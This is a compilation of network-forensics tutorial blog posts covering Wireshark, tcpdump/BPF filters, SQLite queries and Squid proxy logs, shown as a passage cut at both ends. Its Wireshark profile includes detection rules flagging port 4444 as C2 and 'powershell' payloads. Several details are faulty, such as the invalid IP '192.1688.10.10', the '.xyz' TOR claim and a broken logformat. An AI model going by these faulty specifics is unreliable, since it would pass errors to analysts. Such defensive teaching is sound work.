NetFlow from boundary routers . If you have a good relationship with them (and legal clearance), they might be able to give you insight into every bit of inbound and outbound traffic . This can be life-saving if your internal logs were wiped or weren’t enabled. Other Organizations If your infrastructure is used to attack someone else (e.g., you got pwned and became a launchpad), they might send you logs showing: Source IP Port used Packet metadata But let’s be real— no one is going to start these conversations in the middle of a crisis. This is where ISACs or threat intel sharing groups can help. Set up those channels before you need them. ------------------------------------------------------------------------------------------------------------ Planning Your Logging Strategy There are three types of planning scenarios: 1. Strategic/Architectural (Baked-in) This is where security folks are part of the network design from the beginning . You decide where to place proxies, IDS sensors, and flow log exporters before any incident happens. Pros: Zero downtime when an incident hits Continuous visibility Forces network engineers to build security into the design Cons: Expensive Requires justification (hard to show value until things go wrong) Might involve proprietary data formats (vendor lock-in) 2. Tactical/Ad-hoc Platforms This is my personal favorite—especially if you’re low on budget. Build or buy portable packet capture boxes that you can deploy anywhere in the network when needed. Pros: Super flexible You control the setup Easier to train your team on Cons: Might need downtime to insert the box You’ll need solid documentation for how/when/where to deploy These are best when paired with a few pre-positioned sensors in high-value areas. 3. “We’ll Figure It Out When It Happens” No. Just... no. Seriously, don’t wing it. You’ll be halfway through the breach trying to order a capture card off Amazon. Instead, build a hybrid model: Place permanent monitors at your perimeter and crown jewels Keep a few tactical boxes on standby Train your team regularly to know how to use both ----------------------------------------------------------------------------------------------------------- Don't Forget DNS Visibility One last but crucial thing: DNS logs . DNS is everywhere, and attackers love it for C2, exfiltration, and even domain generation algorithms (DGA). Make sure: Internal DNS resolvers are logging queries and responses External DNS providers (like Google, Cloudflare, etc.) are integrated into your SIEM if they allow it DNS visibility = quicker scoping, faster identification of malware domains, and understanding attacker behavior. ----------------------------------------------------------------------------------------------------------- Wrapping It Up This stuff isn't just for blue teams. Red teamers, threat hunters, and IR folks all benefit from proper flow visibility. If you're serious about incident response or DFIR, flow data isn't a luxury— it's a necessity . Let’s keep pushing for opensource cybersecurity knowledge. --------------------------------------------Dean---------------------------------------------------------
Master Wireshark tool Like a Pro: – The Ultimate Packet Analysis Guide for Real-World Analysts
Thanks for stopping by! I know you’ve probably come across tons of Wireshark articles already, but trust me—this one’s different. I’ve kept it real, practical, and straight from an investigator perspective. Give it a read, and you’ll see exactly what I mean. 🦈 ----------------------------------------------------------------------------------------------------------- Hey folks 👋 Dean here! So, if you’re diving into packet analysis or network forensics, you will spend a LOT of time inside Wireshark — that’s just a fact . This article is all about getting comfortable with Wireshark’s GUI and some key features that make your job easier and your analysis sharper. Wireshark’s Interface – Know Your Panes When you open Wireshark, the interface is split into three main sections (panes), and each plays a unique role: 1. Packet List Pane This is your bird’s-eye view. Each row is a packet. By default, you'll see columns like: Time – Time since the start of the capture (can be changed to UTC/human-readable format). Source/Destination IPs Protocol Info – A quick summary, which is super helpful when scanning for suspicious behavior. You can fully customize this view: add, remove, or reorder columns. For instance, if you want to add http.user_agent , you can do that – empty for non-HTTP packets, of course. 2. Packet Details Pane Now we get to the fun part — protocol decoding! Here you’ll see the packet broken down by layers: Ethernet → IP → TCP/UDP → Application layer data Each section is clickable and expandable. This pane is gold when you're analyzing weird or unfamiliar protocols because Wireshark does the heavy lifting and shows human-readable names and field values. 3. Packet Bytes Pane This is your raw hex + ASCII view. It may feel intimidating at first, but trust me — this view is powerful. You can click on a byte here and it will highlight the corresponding field in the Packet Details pane (and vice versa). ----------------------------------------------------------------------------------------------------------- Smart Display Filters – Your Best Friend in Big PCAPs When you’re staring at thousands of packets, Display Filters are a lifesaver. You’ll find the Display Filter Toolbar at the top. You can type stuff like: http ip.addr == 192.168.1.1 tcp.port == 443 These don’t just make your life easier — they help you zoom into what's important without the noise. Down at the bottom, the Status Bar tells you: Total packets Packets matching your current filter Field names and byte sizes for whatever you’re hovering over Super useful when building precise filters or understanding payload size. Layout Customization – Looks Can Boost Productivity Wireshark lets you change the pane layout! 🧱 This might sound cosmetic, but if you’re working on a small screen, a widescreen monitor, or presenting on a projector, tweaking the layout can hugely improve usability. Choose from six layouts and decide what each pane shows. Try it. It helps. Let’s Talk OPSEC – DNS Lookups and What NOT to Do By default , Wireshark disables DNS lookups. That’s not a bug, that’s a feature. Here’s why: Performing live DNS lookups for every IP in a capture slows everything down . Worse: If you're analyzing malware traffic, querying attacker infrastructure can tip them off that you’re onto them . Never turn on “Use an external network name resolver” if you care about stealth. Trust me — adversaries do monitor their DNS logs. Instead, use: “ Use captured DNS packet data for address resolution ”This resolves hostnames from the DNS packets in the capture — no external traffic. Timestamp Formats – Pick What Works for You Wireshark gives multiple time format options: Seconds since capture start (default) UTC (recommended) Local time With or without microsecond precision You can change this from the View > Time Display Format menu. ⚠️ Keep in mind:T imestamps in the packet metadata (in the pcap) are in UTC. But any timestamps inside the packet data (like HTTP headers or app logs) can be in any timezone. So don’t mix them up. ----------------------------------------------------------------------------------------------------------- 🔧 More Tips for Better Investigations Add your own custom columns! Need to see dns.qry.name in the top view? You can add it. Use color rules to highlight suspicious traffic. E.g., make HTTP POSTs Green. Save your profiles – layout, filters, colors – for different use cases (malware, exfil, RDP analysis, etc.) HOW TO CREATE A PROFILE IN WIRESHARK Open Wireshark Go to Edit > Configuration Profiles Click New and give it a name (e.g., MalwareAnalysis) Select it, then click OK This activates the profile—you’ll now be customizing this one Lets give you an example: 1. MALWARE ANALYSIS PROFILE Columns to Add frame.number ip.src ip.dst tcp.stream http.request.method http.host http.request.uri dns.qry.name tcp.len Coloring Rules Filter Description BG Color http.request.method == "POST" Suspicious POSTs Red dns.qry.name contains ".xyz" TOR Domain Purple tcp.port == 4444 C2 Comms Dark Red udp contains "powershell" Obfuscated Payloads Orange Output: Note: If I receive any requests, I’ll publish a follow-up article sharing a few ready-made profiles that can assist in deeper analysis. However, if you're only interested in learning how to create a profile, the information in this article should be sufficient. ----------------------------------------------------------------------------------------------------------- Lets talk about Display Filters Imagine we’re staring at a huge PCAP file — like, thousands of packets — and we need to find just the suspicious HTTP request or that DNS reply pointing to a shady domain. Manually clicking through each packet? Nope. That’s where Wireshark Display Filters come in. And trust me, once you get the hang of them, they’ll become your best friend in traffic analysis. First, What Are Display Filters? Wireshark is already super powerful with its decoders and GUI, but display filters make it even better. Basically, display filters allow you to tell Wireshark: "Hey, show me only the packets that match this very specific condition." And here’s the kicker — any field Wireshark can decode can also be filtered . Whether it’s an IP address, port number, DNS name, cookie value, or even the number of DNS answers — i f it’s in the packet and Wireshark can read it, you can filter it. Display Filter vs Capture Filter (BPF) You may be wondering — "Wait, isn’t that what capture filters do?" Great question. 🟢 Capture Filters (BPF) work before the packets are even captured — they sit close to the kernel, fast and efficient. 🟡 Display Filters work after the capture — they analyze the decoded traffic and give you crazy granularity. So if you're capturing live and only want HTTP port 80 traffic: tcp port 80 (That’s a capture filter , BPF-style.) But once the PCAP is saved, and you want to find HTTP packets with the word "hack" in them , that’s when display filters shine: http contains "hack" Real-Life Examples You’ll Actually Use Let’s look at some cool and practical filters you’ll definitely end up using: 1. Find non-standard HTTP traffic containing specific text (not tcp.port == 80 and not tcp.port == 8080) and http contains "hack" 2. DNS replies with more than 5 answers (maybe shady as hell) dns.flags.response == 1 and dns.count.answers > 5 and dns.qry.name contains "drive.io" 3. Case-insensitive matching (thanks to RegEx!) http.cookie matches "(?i)dean" 4. OR multiple status codes like a pro http.response.code in {200 301 302 404} Finding Field Names for Filters One of the most common questions is: "How do I even know what field name to use?" Here’s the trick: Right-click any field in the Packet Details pane (middle pane), and you’ll see: ✅ Apply as Filter — applies the filter instantly 📝 Prepare a Filter — lets you tweak the filter before running it Let’s say you’ve got a DNS query for www.cyberengage.org , and you want to filter only those. Wireshark shows the field name as: dns.qry.name == "www.cyberengage.org" That’s it. GUI does half the work for you! The Stoplight System (Green, Yellow, Red) Wireshark helps with syntax too. You’ll see the filter bar change colors: 🟩 Green – valid syntax, ready to go. 🟥 Red – error in field name or syntax (like missing quotes). 🟨 Yellow – valid syntax, but potential logical issues (like using != in the wrong way) Let’s Talk About != Here’s where things get tricky — t he != operator might not behave like you’d expect . Say you write: dns.a != 192.168.1.1 Wireshark may still include packets with that IP. Why? Because that same packet also had a different dns.a value. So the better filter would be: dns.a && !(dns.a == 192.168.1.1) This means: " Show me packets that have any dns.a field, but NOT if any of those are 192.168.1.1." Tricky, right? But powerful once you get it. ----------------------------------------------------------------------------------------------------------- Lets talk about TCP Stream What Is “Follow TCP Stream” and Why It’s Gold Let’s start with the basics. Imagine you’re deep inside a pcap file, and you're tracking an IP address that might be talking to a shady server . You click on a suspicious packet, right-click it, and boom — there’s this magical option: “Follow → TCP Stream.” What this does is extract the entire conversation (client-to-server and server-to-client) into a single readable view. It’s color-coded too: 🔴 Red = client → server 🔵 Blue = server → client It’s super helpful, especially for ASCII-based protocols like HTTP, FTP, SMTP, or even Telnet . You can literally read full login attempts, commands, and responses like reading a chat transcript. A Pro Tip There’s a dropdown labeled “Entire Conversation.” You can use that to focus on just one side of the traffic — really helpful when the streams get noisy or tangled. Not Just TCP Wireshark lets you follow UDP , TLS , and HTTP streams too. This is great for protocols that don’t rely on TCP’s session-based structure. Beyond the Basics: Must-Know Features in Wireshark Wireshark is a beast — no other way to put it. Decode As Alternate Protocol Sometimes threat actors do shady things like running HTTP traffic over random ports (say, port 9999). Wireshark might misinterpret the protocol. With Decode As, you can force Wireshark to analyze the traffic using the protocol you know is actually being used. Traffic Capture Tips Wireshark can both capture and analyze traffic. But beware — the GUI adds processing overhead , and you might drop packets if you’re capturing high-volume traffic. ----------------------------------------------------------------------------------------------------------- Final Thoughts In real-world cases, these tools help you go from “what’s going on?” to “here’s exactly what happened” —faster and with more confidence. Don’t be afraid to explore, experiment, and get your hands dirty. The more comfortable you get with these tools, the more powerful and efficient your analysis becomes. Keep digging, keep questioning, and most importantly, keep learning . You’re not just reading packets—you’re uncovering stories hidden deep in the network. Thanks again for reading. I hope this walkthrough gave you something valuable—something practical you can carry into your next case or lab session. Happy hunting! ( https://wiki.wireshark.org/ ) ----------------------------------------Dean--------------------------------------------
Forensic Analysis of SQLite Databases
SQLite databases are widely used across multiple platforms, including mobile devices, web browsers, and desktop applications. Forensic analysts often encounter SQLite databases during investigations, making it essential to understand their structure and the tools available for analyzing them . Understanding SQLite Databases SQLite databases consist of multiple files , each serving a specific purpose. Identifying these files is crucial during forensic investigations: Main Database File: Typically has extensions such as .db, .sqlite, .sqlitedb, .storedata , or sometimes no extension at all. Write Ahead Log (WAL): A .wal file that may contain uncommitted transactions, providing additional forensic insights. Shared Memory File: A .shm file that facilitates transactions but does not store data permanently. Analyzing SQLite Databases An SQLite database consists of tables that store data in columns. Some databases have a single table, while others contain hundreds, each with unique schemas and data types. When performing forensic analysis, it’s important to understand how these tables interact and how data is stored. Tools for SQLite Analysis Forensic analysts use various tools to examine SQLite databases. These tools fall into two main categories: GUI-Based Viewers: User-friendly tools like DB Browser for SQLite allow visual analysis but may automatically merge WAL file transactions into the main database. Command-Line Utilities: Tools like sqlite3 provide a powerful way to run queries and extract data, making them ideal for scripting and automation. Forensic-Specific Tools: These tools offer advanced recovery features, allowing analysts to examine deleted records and unmerged transactions. Querying SQLite Databases Once the database structure is understood, analysts can run SQL queries to extract relevant information. Below are key SQL operations commonly used in forensic investigations: 1. Using the SELECT Statement The SELECT statement retrieves data from a table. The simplest form is: SELECT * FROM fsevents; This retrieves all columns from the access table. However, for targeted analysis, selecting specific columns is more efficient: SELECT fullpath, filename, type, flags, source_modified_time FROM fsevents; When multiple tables share column names, it’s best to specify the table name: SELECT access.service, access.client FROM access; 2. Converting Timestamps Many SQLite databases store timestamps in Unix epoch format. Converting them to a readable format is crucial for timeline analysis: SELECT url, visit_time,datetime((visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM visits; The AS keyword renames the column for better readability. 3. Using DISTINCT to Find Unique Values The DISTINCT keyword helps identify unique values within a column . For instance, to find unique permission types in the access table: SELECT DISTINCT url FROM urls; 5. Using CASE for Readability To make data more understandable, analysts can use the CASE expression to replace numerical values with meaningful labels: SELECT url, visit_count, CASE hidden WHEN 0 THEN "visible" WHEN 1 THEN "hide" END Hidden, datetime((last_visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM urls 6. Sorting Data with ORDER BY Sorting records chronologically can help establish an event timeline. The ORDER BY clause arranges records based on a specified column: SELECT url, visit_count, CASE hidden WHEN 0 THEN "visible" WHEN 1 THEN "hide" END AS Hidden, datetime((last_visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM urls ORDER BY last_modified DESC; 7. Filtering Data with WHERE and LIKE For large datasets, filtering results is essential. The WHERE clause helps narrow down data based on conditions: SELECT url, visit_count, CASE hidden WHEN 0 THEN "visible" WHEN 1 THEN "hide" END AS Hidden, datetime((last_visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM urls WHERE last_modified LIKE '2025-01-16%' The % wildcard allows partial matches, making it useful for date-based searches. ----------------------------------------------------------------------------------------------------------- Conclusion SQLite database forensics plays a crucial role in digital investigations, from mobile forensics to malware analysis. By understanding SQLite file structures, using the right tools, and applying effective query techniques, forensic analysts can extract valuable insights from databases. -------------------------------------------------Dean-----------------------------------------------
BPF Ninja: Making Sense of Tcpdump, Wireshark, and the PCAP World
Hey folks! Today we’re diving into a topic every network forensic analyst must get familiar with: tcpdump and the power-packed world around it— Wireshark , pcap , pcapng , and all the little details that actually matter when you're dealing with real-life packet analysis. If you’re like me and enjoy understanding why a tool works the way it does (and not just copy-pasting commands from Stack Overflow), this blog’s for you So, What’s tcpdump and Why Should You Care? Imagine this: You're investigating suspicious traffic, and all you’ve got is command line access. You need something light, fast, reliable—and boom— tcpdump comes to your rescue. It’s a CLI-based packet capture tool that lets you sniff traffic in real time, apply filters, and save packet data for analysis. Originally born in the *NIX universe , it now works on Windows too. Pretty cool, right? Under the hood, tcpdump uses the legendary libpcap library, which is like the oxygen tcpdump breathes. Here's what makes it so useful: 💡 Key Superpowers of tcpdump (Thanks to libpcap): 🔍 1. BPF (Berkeley Packet Filter) This is a simple filtering language that lets you capture only the traffic you want . For example: tcpdump port 443 and host 192.168.1.9 Boom—you’re only grabbing HTTPS packets to/from that host. 💾 2. Capture or Save Packets You can choose to display packet headers on-screen, or save them into .pcap files to analyze later. These files are gold for forensic investigations. Imagine capturing something today and analyzing it 3 years later—yep, pcap has your back. 🔁 3. Live or Offline tcpdump can sniff a live interface or read from a saved .pcap file as if it’s a live stream. That’s super helpful when you’re analyzing a case retrospectively. 📏 4. Snaplen Control Don't want to capture entire packets because of size or legal constraints? Use -s to define the snap length (i.e., number of bytes to capture per packet). Capturing just the headers? No problem. tcpdump -s 96 -i eth0 -w output.pcap 🧠 Heads-Up: tcpdump Is for Capturing, Not Deep Diving tcpdump is great for capturing data, but it doesn’t do fancy analysis . When you want to dissect those packets like a digital autopsy, you bring in the big gun: Wireshark . 🐟 Enter Wireshark: Your Friendly GUI Packet Analyzer Wireshark is a graphical application that reads .pcap and .pcapng files, and honestly, it's a lifesaver when you're trying to figure out what went down on the wire. It decodes hundreds of protocols out of the box and lays everything out for you in a beautiful 3-pane display. What makes Wireshark insanely useful: Auto-dissectors for common protocols Follow TCP Stream feature for full conversation analysis Color-coded filtering Click-and-zoom details for every packet field Pro tip: You can capture packets directly in Wireshark, but for high-volume environments or remote machines, stick with tcpdump. 📟 Want CLI Power with Wireshark's Brain? Use tshark Wireshark also comes with tshark , its CLI twin. So you can build your filters in Wireshark’s GUI and then export them to tshark scripts—perfect for large-scale or automated analysis. tshark -r test.pcap -Y "http.request.method == GET" 📂 What’s Really Inside a .pcap File? Okay, this is where things get forensically juicy. A .pcap file is not just a bunch of packets thrown together. It includes metadata that matters: File Header Includes: Magic Bytes: Helps identify it as a pcap file. Most common = 0xd4c3b2a1 (little-endian). Version: For libpcap compatibility. Timestamp Offset: Usually zero (all timestamps are in UTC—thank god). Snaplen: Max bytes per packet saved. Link Type: Like Ethernet, Wi-Fi, etc. Each Packet Entry Has: Timestamp (seconds + microseconds since epoch) Captured Length Original Packet Length (in case it was truncated) These tiny details help determine whether you lost data during capture or were just intentionally limiting it. 📦 pcapng: The Next-Gen Format (but Be Careful) Then comes pcapng —aka pcap Next Generation . It’s more flexible and stores: Multiple interfaces in one file Rich metadata (like capture comments) Higher-res timestamps Interface stats and DNS logs Sounds awesome, right? But here’s the catch : Not all tools support it properly . Even some versions of tcpdump can’t read pcapng without throwing vague errors. So what do we do? Convert it to regular pcap using editcap (comes with Wireshark): editcap -F pcap captured_file.pcapng capture_file.pcap Double-check with: file capture_file.pcap And voilà—you’re back in business. 🛠️ Thoughts: tcpdump and Wireshark = A Power Combo Here’s how I look at it: Use tcpdump for quick, controlled, stealthy captures (especially remotely or over SSH). Use Wireshark for visual, detailed, protocol-level analysis. Use tshark when you need scripting and automation. Stick to pcap unless you absolutely need pcapng features. Always verify your captures. A truncated packet can break your case. -------------------------------------------------------------------------------------------------- Lets talk about BPF Filters We’re diving into something that might sound dry but is actually one of the most powerful tools in your network forensics and incident response toolkit: BPF (Berkeley Packet Filter) syntax . Now, if you’ve worked with tcpdump, Wireshark, or even snort or bro/zeek, you’ve already touched BPF . Think of it like your VIP bouncer at a nightclub—BPF decides what packets are "interesting" enough to get through the door and what gets kicked to the curb. 🧹 So why should you care? Because it’s super-efficient , running close to the kernel, and helps you cut down on noise , saving time and resources during investigations or live captures. 🧠 What Even Is BPF? At its core, BPF is a way to tell your system, “ Only give me the packets I care about.” It’s a language that lets you define filters for capturing or processing packets. Since tools like tcpdump and Wireshark use libpcap under the hood, BPF filters work across most major packet capture tools. That’s why learning it once pays off everywhere . 🧱 BPF Primitives: The Basics Let’s say you're filtering water through a sieve. The holes in that sieve are your BPF filters . The smaller and more specific the holes, the more precise the capture. Here are the building blocks (called primitives ): ip, ip6, tcp, udp, icmp: Protocol matchers. ip is IPv4 traffic. ip6 is IPv6. If you want both: ip or ip6. host: Filters packets by IP address (Layer 3). Example: host 192.168.1.1 ether host: Filters by MAC address (Layer 2). Example: ether host 00:11:BA:8c:98:d3 net: Filters by network range (CIDR). Example: net 172.168.1.1/8 port: Filters by TCP/UDP port (Layer 4). Example: port 443 (catches both TCP and UDP unless specified) portrange: A range of ports. Example: portrange 20-25 💡 Tip: BPF is stateless . It evaluates each packet independently, so if you're tracking a flow or multi-step exchange, that's handled in higher layers (e.g., Zeek, Suricata). 🔄 Directional Filters: src, dst, both? Sometimes, you don’t want all traffic to/from an IP—maybe just the ones sent by it. Here’s how direction works: src host 192.168.1.1 → only source. dst port 443 → only destination. ether src 00:11:BA:8c:98:d3 → source MAC. src net 172.168.1.1/8 → source from entire subnet. ⚠️ Note: When you say just host, port, or net, it’s bidirectional. Be specific if needed! 🧮 Combining Filters: AND, OR, NOT This is where it gets fun (and powerful). You can combine primitives logically: tcp and (port 80 or port 443) and not host 192.168.1.1 ⬆️ That says:“Give me all TCP traffic on ports 80 or 443, but exclude anything involving 192.168.1.1.” 📌 Wrap complex filters in quotes , especially in shell commands. Shells interpret parentheses and spaces—don’t let that ruin your day. 🧪 Advanced Primitives (Forensics-Friendly) You’ll probably need these in more forensic-heavy cases: vlan 100 → Capture traffic on VLAN 100. gateway → Detect packets with mismatched Layer 2/3 addressing (good for catching rogue devices). Byte offsets & bitmasks → Ultra-specific matching based on packet byte positions. (More niche, but very powerful!) 🧰 Tcpdump Tips for Real-World Use Let’s be honest—tcpdump can do a LOT more than just watch packets fly by your screen. Here are some gold-nugget options: Flag What it does -i any Capture from all interfaces. -n Disable DNS resolution (important for stealth & speed). -r file.pcap Read from a PCAP instead of live traffic. -w out.pcap Write captured packets to a file. -C 5 Rotate output every 5MB. -G 30 Rotate output every 30 seconds. Use with -w and time-formatted filenames like: -w dump_%F_%T.pcap. -W 10 Keep only the last 10 files (used with -C or -G). -F filter.txt Load a complex BPF filter from a file instead of typing it inline. Super helpful in team environments. 🎯 Real-Life Example: Reducing a PCAP for Wireshark Imagine you’ve got a 500MB pcap file but Wireshark can barely open it. You want to reduce it to something smaller—say, only traffic on HTTP/S or exclude noisy DNS and multicast. Here’s how: tcpdump -n -r full_capture.pcap -w reduced_capture.pcap 'tcp and (port 80 or port 443) and not port 53 and not net 192.168.1.1/4' 💡 This can cut the file size by almost 40–50% if the excluded traffic is significant. 📚 TL;DR - Quick Reference Use quotes! 'port 80 and not host 10.0.0.1' Know your direction: src, dst, host, ether host Reduce noise: Use -n to disable DNS, and filter early Modularize filters: Use -F for long BPFs Save time: Use -C, -G, -W for file rotation -------------------------------------------------------------------------------------------------- Before ending todays article, I want to give few commands which might be helpful for you First Let’s admit it — network forensics can sound scary at first. You open up Wireshark or run tcpdump and BAM! — thousands of packets flying across the screen like it's The Matrix. Let’s jump into some cool and useful tcpdump commands with real-world examples and context. Example 1: Live Sniffing on an Interface — But Keep It Light sudo tcpdump -n -s 100 -A -i eth0 -c 1000 🧠 What it does : Monitors the eth0 interface (you can replace it with yours etc.) Captures only the first 100 bytes of each packet (-s 100) to avoid dumping the whole packet — helpful for big networks. -A dumps the actual ASCII content , which is super helpful for catching things like HTTP requests, cleartext creds, etc. Stops after 1000 packets (-c 1000) so you don’t go blind. -n speeds things up by not resolving DNS or port numbers — we want raw IPs and ports. Example 2: Filter a pcap file for traffic from one host tcpdump -n -r captured.pcap -w filtered.pcap 'host 192.168.1.1' 📂 You already have a .pcap file but you’re only interested in what one machine (say, 192.168.1.1) was up to. -r captured.pcap: Reads the original pcap. -w filtered.pcap: Writes only the filtered traffic. 'host 192.168.1.1': Our BPF (Berkeley Packet Filter) here filters both source or destination . 🧪 Try changing 'host' to: 'src host 192.168.1.1': only source 'dst host 192.168.1.1': only destination Example 3: Rotate Files Daily for 2 Weeks — DNS Focused sudo tcpdump -n -i eth0 -w dns-%F.%T.pcap -G 86400 -W 14 '(tcp or udp) and port 53' 🧠 What’s going on here: We’re capturing DNS traffic only (TCP or UDP on port 53). -w dns-%F.%T.pcap: Writes files with timestamps (great for organizing). -G 86400: Rotates every 86,400 seconds = 1 day. -W 14: Keeps only 14 files, so after 2 weeks, it stops or starts overwriting depending on your logic. Perfect for long-term DNS analysis (e.g., DNS tunneling detection, malware beaconing). Example 4: Rotating 100MB Files of Suspected APT Host Traffic sudo tcpdump -n -i eth0-w suspected.pcap -C 100 'host 192.168.1.1' 🔍 Use this when you want to capture unlimited traffic to/from a shady IP, but don’t want your disk to explode. -C 100: Rolls over to a new file every 100MB. Files will be named like: suspected.pcap, suspected1.pcap, suspected2.pcap, etc. 💡 Tip: Add -W to limit how many files you keep: -W 10 Example 5: Filter HTTP Traffic (not encrypted) and show requests sudo tcpdump -i eth0 -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' 😅 I know, this one looks scary. But here's what it's doing: Filters HTTP requests only (and not empty ACKs or TCP keepalives). -A + -s 0 dumps full ASCII of each packet — you can literally see GET and POST requests. Real use case : Someone accessed your internal web app over HTTP. You suspect credential theft or command injection. This gives you a live view of the payloads . Example 6: Capture suspicious outbound connections to multiple ranges sudo tcpdump -i eth0 'dst net 185.100.87.0/24 or dst net 91.219.236.0/24' 🎯 This captures outbound traffic to known shady subnets. Perfect when you're watching beaconing or C2 callbacks. You can expand the filter like this: '((dst net 185.100.87.0/24) or (dst net 91.219.236.0/24)) and not port 443' 👉 Exclude HTTPS to avoid noise! Tips from Me Always test your BPF filter on small captures using -c 100 to make sure it’s not too broad. Wireshark’s filter syntax ≠ tcpdump syntax! In Wireshark, you use ip.addr == x.x.x.x, but in tcpdump you just say 'host x.x.x.x'. Use tcpdump -D to list all interfaces. When in doubt, log to file first , analyze later. Don't grep in real-time unless you know what you're doing. Bonus: Convert pcap to readable text Want to take a .pcap and turn it into readable logs? tcpdump -nn -tttt -r suspicious.pcap > readable_logs.txt You’ll get timestamps + decoded traffic — perfect for incident timelines or report writing. Final Words Tcpdump is one of those tools that feels a bit raw at first, but once you get the hang of BPF filters, it's like having X-ray vision for your network. It's lightweight, powerful, and deadly accurate when used right. Combine it with tools like Wireshark for analysis and you've got a forensic powerhouse in your hands. ------------------------------------------------Dean-------------------------------------------------
Proxies in DFIR– Deep Dive into Squid Log & Cache Forensics with Calamaris and Extraction Techniques
I’m going to walk you through how to analyze proxy logs—what tools you can use, what patterns to look for, and where to dig deeper—but keep in mind, every investigation is different, so while I’ll show you the process, the real analysis is something you will need to drive based on your case. Let’s talk about something that’s often sitting quietly in the background of many networks but plays a huge role when an investigation kicks off: Proxies . Whether you’re a forensic analyst, an incident responder, or just someone interested in how network traffic is monitored, proxies are your silent allies. 🧭 First Things First: What Does a Proxy Even Do? Think of a proxy like a middleman between users and the internet . Every time a user accesses a website, the request goes through the proxy first. This is awesome for: Monitoring user activity : Who went where, when, and what happened. Enforcing policies : Blocking sketchy sites or filtering content. Caching : Saving bandwidth by storing frequently accessed content locally. And the best part? Proxies keep logs . Gold mines for investigations. 🔍 Why Proxy Logs Are a Big Deal in Forensics When you're dealing with a potential breach or malware incident, one of the first questions is: Who visited what site? Now, imagine going machine-by-machine trying to find that out… 😫 That’s where proxy logs shine: ✅ Speed up investigations ✅ Quickly identify systems reaching out to malicious URLs ✅ Track timelines without touching each device individually And even better— some proxies cache content . So even if malware was downloaded and deleted from a device, the proxy might still have a copy in its cache. Lifesaver. 🐙 Enter Squid Proxy – A Favorite Squid is a widely used HTTP proxy server. If you’ve worked in enterprise environments, chances are you’ve run into it. 🧾 Key Squid File Paths: Config file: /etc/squid/squid.conf Logs: /var/log/squid/* Cache: /var/spool/squid/ These are your go-to places when digging into evidence. ----------------------------------------------------------------------------------------------------------- 📈 What You Can Learn from Squid Logs Squid logs tell you things like: Field Example What It Means UNIX Timestamp 1608838269.433 Date/time of the request Response Time 531 Time taken to respond (in ms) Client IP 192.168.10.10 Who made the request Cache/HTTP Status TCP_MISS/200 Was it cached? Was it successful? Reply Size 17746 Size of response HTTP Method GET Type of request URL https://www.cyberengage.org/ Site accessed Source Server DIRECT/192.168.0.0 Origin server IP MIME Type text/html Content type returned So from one single log line, you can know who accessed what , when , and how the proxy handled it. 🧠 Bonus Info: Cache Status Codes That Help You Analyze TCP_HIT: Content served from cache TCP_MISS: Had to fetch from the internet TCP_REFRESH_HIT: Cached content was revalidated TCP_DENIED: Blocked by proxy rules This gives you an idea of how users interact with sites and how often content is being reused. ----------------------------------------------------------------------------------------------------------- ⚠️ Default Squid Logs Are Good… But Not Perfect Here’s the catch: By default, Squid doesn’t log everything you might want during an investigation. For example: 🚫 No User-Agent 🚫 No Referer 🚫 Query strings (like ?user=admin&pass=1234) are stripped by default This can hurt if malware uses obfuscated URLs or redirects. But don’t worry—Squid is super customizable. 🔧 How to Improve Squid Logs for Better Visibility You can change the Squid log format to include things like the User-Agent and Referer. ✅ Example Configuration (Put this in squid.conf): logformat combined %>a %[ui %[un [%tl] "%rm %ru HTTP/%rv" %>Hs %a: Client IP %tl: Local time (human-readable) %rm %ru: HTTP method and URL %>Hs: Status code (200, 404, etc.) %h: Page that referred the user %{User-Agent}>h: Browser or software used %Ss:%Sh: Cache and hierarchy status Boom. Now your logs are a forensic analyst’s dream. 🔍 Sample Human-Readable Log Entry 192.1688.10.10 - - [30/Apr/2025:00:00:00 +0000] "GET https://www.cyberengage.org/...js HTTP/1.1" 200 38986 "http://https://www.cyberengage11.org/..." "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0)... Firefox/47.0" TCP_MISS:HIER_DIRECT From this one line, we can tell: The user at IP 192.1688.10.10 accessed a JavaScript file The browser was Firefox on Windows The request wasn't cached (TCP_MISS) That’s a full story from one log entry. ----------------------------------------------------------------------------------------------------------- 🛑 But Wait—A Word of Caution! Want to log query strings or detailed headers? You must change your config. # In /etc/squid/squid.conf strip_query_terms off ⚠️ Warning : This could capture sensitive data (like usernames/passwords in URLs), so make sure you’re authorized to log this. Respect privacy policies. ----------------------------------------------------------------------------------------------------------- Alright, let’s get real. When you're looking at a Squid proxy for investigation, it can look like a mess of logs, cache files, and cryptic timestamps. But trust me, with the right tools and techniques, you'll be digging up web activity and cached secrets like a forensic wizard . 🛠️ Let’s Begin with a Tool – Calamaris So first up, there's this pretty slick tool called Calamaris – great for getting summaries out of Squid logs. It's not fancy-looking, but it's efficient, and sometimes that's all you need. You can check out the tool here: Calamaris Official Page To install it inside your WSL (Windows Subsystem for Linux), just run: sudo apt install calamaris Boom. Installed. Now let’s analyze a Squid access log: cat /mnt/c/Users/Akash\'s/Downloads/proxy/proxy/proxy2/squid/squid/access.log | calamaris -a And just like that, it spits out a clean summary. Requests, clients, status codes—it’s all there. This makes the initial review of a log super simple. 🔎 BUT... there’s a catch. If your Squid logs use a custom format (which happens often in real environments), Calamaris might fumble. So if your output looks weird or incomplete , don’t panic—we’ll have to get our hands dirty and analyze stuff manually. Let’s keep going. 🕰️ Dealing with Timestamps – From Unix to Human By default, Squid logs come with UNIX epoch timestamps . Unless you're a robot, they aren't human-friendly. But converting them is easy. Use this: date -u -d @1742462110.226 That -u gives you UTC format (ideal for timeline consistency). Now you're thinking—"Akash, am I supposed to convert each timestamp manually?" Heck no. Here's a one-liner that’ll do the job for the entire log file: sudo cat /mnt/c/Users/Akash\'s/Downloads/proxy/proxy2/squid/squid/access.log | awk '{$1=strftime("%F %T", $1, 1); print $0}' > /mnt/c/Users/Akash\'s/Downloads/readable.txt This outputs a clean, readable version of your log into readable.txt. 📂 Important Files to Collect in a Squid Forensic Investigation While you’re getting into the logs, don’t forget to grab these essentials: /etc/squid/squid.conf – Config file that tells you how the proxy works, where logs are stored, ACLs, cache settings, etc. /var/log/squid/access.log – The main access log (you’ll be here a lot) /var/log/squid/referer.log, /useragent.log, /cache.log, /store.log – 